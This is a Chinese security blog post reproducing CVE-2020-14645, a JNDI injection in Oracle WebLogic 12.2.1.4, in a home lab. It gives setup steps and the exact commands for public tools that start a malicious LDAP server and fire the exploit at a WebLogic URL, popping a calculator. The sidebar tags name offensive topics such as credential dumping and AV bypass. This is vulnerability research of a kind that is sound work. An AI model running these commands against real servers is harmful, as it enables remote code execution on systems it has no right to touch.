CVE-2020-14645 Weblogic JNDI injection 漏洞复现
Weblogic     CVE-2020-14645     JNDI    

CVE-2020-14645 Weblogic JNDI injection 漏洞复现

276 次访问
leader
Scroll Down

CVE-2020-14645

主要最近在研究weblogic的内存马,在github上面搜到https://github.com/feihong-cs/JNDIExploit 这个项目里面有一段内存马代码,想套用到14882那个漏洞上面,但是发现cmdshell可以,冰蝎的马好像有些问题。既然他是JNDI注入来运行class,那么我就想能不能和CVE-2020-14645联动起来。最终结果是失败的,原因暂时没有找到。

那么主要来复现一下CVE-2020-14645这个漏洞。

安装环境

安装jdk 8u131 版本,去官网下载即可,安装过程就省略了~
地址:https://www.oracle.com/cn/java/technologies/javase/javase8-archive-downloads.html

安装Weblogic 12.2.1.4版本,也去官网下载。
地址:https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html

管理员身份运行cmd,然后输入jdk地址和安装包地址:

Snipaste_20201125_134043.jpg

一直下一步就行

Snipaste_20201125_134307.jpg

这里全部勾选最好。

Snipaste_20201125_134336.jpg

运行Weblogic
Snipaste_20201125_134512.jpg

下载工具

这里直接用github上面有的工具打就可以了

https://github.com/DSO-Lab/defvul/tree/master/CVE-2020-14645_Weblogic

下载下来然后mvn编译一下,即可

使用方法:

java -jar target/CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL

这里需要起一个JNDI服务,所以用到

https://github.com/welk1n/JNDI-Injection-Exploit 这个工具

复现成功

首先输入命令:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C calc -A 192.168.91.1

起一个ldap的服务

然后在输入:

java -jar CVE-2020-14645.jar 192.168.91.1:1389/bcbiyj http://192.168.91.4:7001

最后成功弹出计算器

Snipaste_20201125_141013.jpg

© 本文著作权归作者所有,转载前请务必署名

最新文章
mvn踩坑日记

新装的maven,使用maven命令进行打包时,报错:Couldnottransferartifactorg.apache.maven.plugins:maven-clean-plugin:pom:2.5from/tocentral(https://repo.maven.apache.org/mav
mac Big Sur系统 mvn打包报错:No compiler is provided in this environment. Perhaps you are running on a JRE

转载来自:https://blog.csdn.net/w605283073/article/details/111770386一、背景最近将mac升级到BigSur版本,出现了个别奇奇怪怪的小问题。系统升级后执行mvn命令,总是出现以下错误:Nocompilerisprovidedinthisenv
用友NC6.5安装教程

用友NC6.5安装教程由于最近想复现一下NC6.5的漏洞和自己走一遍分析流程。安装环境:Windows2008Sqlserver2012(这里我被坑了很久,只支持2012)Nc6.5安装包前提NC6.5支持的数据库,我之前一直用sqlserver2008,结果一看这个文档,把我气死了。。。安装1.将
「转」MSSQL CLR 执行命令

https://www.cnblogs.com/websecyw/p/11888947.html首先创建一个dll,dll的功能命令执行代码usingSystem;usingSystem.Data;usingSystem.Diagnostics;usingSystem.Data.SqlTypes;u
Homebrew 国内镜像源

Homebrew国内镜像源腾讯云的速度比较快替换brew.git:gitremoteset-urloriginhttps://mirrors.cloud.tencent.com/homebrew/brew.git替换homebrew-core.git:gitremoteset-urloriginht
分类
解题思路 writeup
工具 1593115068035
小技巧 1590506915066
漏洞复现 vulnhub
杂记 1578377560604
权限维持 1577677481988
Bypass bypass
ATT&CK attck
红蓝对抗 redteam
标签
Nday nday
普元EOS 普元eos
mvn mvn
CLR clr
MSSQL mssql
Homebrew homebrew
2020年总结 2020年总结
传输Webshell 传输webshell
远程命令执行 远程命令执行
Webshell webshell
JNDI jndi
CVE-2020-14645 cve-2020-14645
内存马 内存马
解题思路 解题思路
墨者学院 墨者学院
Defcon 2020 defcon2020
CVE-2020-14882 cve-2020-14882
导出lsass 导出lsass
DumpPassword dumppassword
Chrome浏览器密码导出 chrome浏览器密码导出
Decrypt-pass decrypt-pass
Decrypt-Chrome-pass decrypt-chrome-pass
Chrome chrome
Shellcode shellcode
免杀 免杀
cobaltstrike远控 cobaltstrike远控
CS cs
cobaltstrike cobaltstrike
反序列化漏洞 反序列化漏洞
Fastjson反序列化漏洞 fastjson反序列化漏洞
Fastjson fastjson
frp代理钉钉通知 frp代理钉钉通知
frp代理软件 frp代理软件
frp frp
无文件 无文件
回显 回显
Shiro反序列化 shiro反序列化
Shiro shiro
微信解密 1593115099474
微信聊天记录解密 1593115099470
命令执行 1590506843774
Tips tips
无回显 1590506843757
CNVD-2020-10487 cnvd-2020-10487
Tomcat幽灵猫 tomcat
CVE-2020-1938 cve-2020-1938
实战 1588140261114
通达OA oa
CVE-2020-2555 cve-2020-2555
漏洞复现 1587026226930
CVE-2020-2551 cve-2020-2551
Weblogic weblogic
2019 2019
总结 1578377564263
记录SSH密码 ssh
权限维持 1577677497553
Linux linux
红队 1577245982632
T1003 t1003
Credential Dumping credential-dumping
抓取密码 1577242318501
Mimikatz mimikatz
ProcDump procdump
Simple-Loader simple-loader
T1223 t1223
CHM chm
绕过windows defender windows-defender
att&ck attck
MSbuild msbuild
远控上线 1576224996894
过360 360
反弹shell shell
PowerShell powershell
BypassAV bypassav
PowerLine powerline